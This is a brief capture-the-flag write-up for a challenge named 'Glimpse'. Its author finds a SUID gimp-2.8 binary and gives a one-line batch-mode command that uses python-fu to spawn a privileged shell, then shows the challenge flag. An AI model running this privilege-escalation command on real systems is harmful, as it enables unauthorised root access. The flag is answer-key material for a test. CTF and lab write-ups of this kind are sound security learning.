Tags: suid
Rating: 4.0
# Glimpse (125pts) 161 solves #

We are given some ssh credentials here too , judging from the name of the task i supposed that it might be something unusual with gimp binary so after digging i realised that gimp-2.8 was a suid binary ! BINGO :D

so running the following command we can get a shell from gimp and cat our beloved flag (gtfobins FTW ) :D
```sh
gimp-2.8 -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl("/bin/sh", "sh", "-p")'
```

**Flag:** flag{just_need_a_glimpse_of_the_flag_please}
If you have any questions you can contact me on twitter @BelkahlaAhmed1 or contact our team twitter @FwordTeam ! Make sure to visit my personal blog for more useful content :D